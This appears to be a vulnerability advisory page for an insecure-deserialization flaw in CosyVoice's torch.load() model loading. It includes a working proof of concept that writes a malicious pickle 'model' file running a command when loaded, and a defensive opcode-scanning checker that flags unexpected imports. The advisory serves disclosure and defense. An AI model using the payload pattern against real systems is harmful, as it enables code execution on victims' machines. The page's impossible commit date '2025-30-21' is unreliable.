Security Vulnerability Report

CVE-2026-31252

Published: 2026-05-11 17:16:20
Last Modified: 2026-05-12 20:16:34

Description

CosyVoice through commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework calls torch.load() on model weight files (e.g., llm.pt, flow.pt, hift.pt) without the restrictive weights_only=True parameter, so the full pickle module is used and arbitrary Python objects can be deserialized. An attacker can exploit this by supplying a malicious model directory containing specially crafted model files; when a victim starts the CosyVoice Web UI pointing at that directory, arbitrary code is executed on the victim's system during model loading.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

CosyVoice <= commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (no CPE configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import torch
import os


class MaliciousPayload:
    def __reduce__(self):
        # Execute arbitrary command upon deserialization
        return (os.system, ('calc.exe',))


# Create a malicious model file
malicious_data = MaliciousPayload()

# Save using torch.save (which uses pickle by default)
# Victims will load this thinking it is a valid model weight (e.g., llm.pt)
torch.save(malicious_data, 'malicious_llm.pt')
print("Malicious model file 'malicious_llm.pt' generated successfully.")
```
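As an added example that is not part of this advisory or of the CosyVoice project, the following static pre-load check lists every module and attribute a .pt file's pickle stream would import, by walking its opcodes without ever unpickling it; anything outside an allowlist of model-related modules is reported, which is exactly what a torch.load() call without weights_only=True would otherwise execute. It assumes the torch.save() zip layout with a data.pkl member, and uses json.loads as a constructed stand-in for an arbitrary foreign import.

```python
import collections
import io
import json
import pickle
import pickletools
import zipfile

# Module roots a plain state_dict checkpoint legitimately references (assumption; extend for your models).
ALLOWED_ROOTS = {"torch", "collections", "numpy", "_codecs"}

def pickle_imports(stream: bytes):
    """List every (module, name) the stream would import; walks opcodes, never unpickles."""
    found, strings = [], []  # strings: recent str args; STACK_GLOBAL consumes the last two
    for opcode, arg, _pos in pickletools.genops(stream):
        if opcode.name == "GLOBAL":  # protocol <= 3: one "module name" argument
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":  # protocol 4+: module and name were pushed earlier
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

def checkpoint_streams(blob: bytes):
    """Yield the pickle streams of a torch.save() zip (its .pkl members), or a bare pickle as-is."""
    bio = io.BytesIO(blob)
    if zipfile.is_zipfile(bio):
        with zipfile.ZipFile(bio) as zf:
            for member in zf.namelist():
                if member.endswith(".pkl"):
                    yield zf.read(member)
    else:
        yield blob

def suspicious_imports(blob: bytes):
    """Imports outside ALLOWED_ROOTS; non-empty means torch.load() without weights_only=True would run foreign code."""
    return [(m, n) for s in checkpoint_streams(blob)
            for m, n in pickle_imports(s) if m.split(".")[0] not in ALLOWED_ROOTS]

def as_torch_zip(stream: bytes) -> bytes:
    """Constructed sample: wrap a pickle in the archive/data.pkl layout torch.save() writes."""
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w") as zf:
        zf.writestr("archive/data.pkl", stream)
    return bio.getvalue()

# Constructed samples: a weights-only state dict, and a stream referencing a non-model callable.
BENIGN_PT = as_torch_zip(pickle.dumps(collections.OrderedDict(bias=[0.1, 0.2])))
TAINTED_PT = as_torch_zip(pickle.dumps(json.loads))  # json.loads stands in for any foreign import
TAINTED_P2 = pickle.dumps(json.loads, protocol=2)  # bare protocol-2 stream, exercises the GLOBAL path
```

Run suspicious_imports() on a checkpoint before handing it to torch.load(); it complements, rather than replaces, passing weights_only=True.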

References

https://github.com/FunAudioLLM/CosyVoice
https://www.notion.so/CVE-2026-31252-35d1e139318881ef8acfcd877a432569

Weaknesses

CWE-94, CWE-915 (secondary source 134c704f-9b21-4f2e-91b3-4a467353bcc0)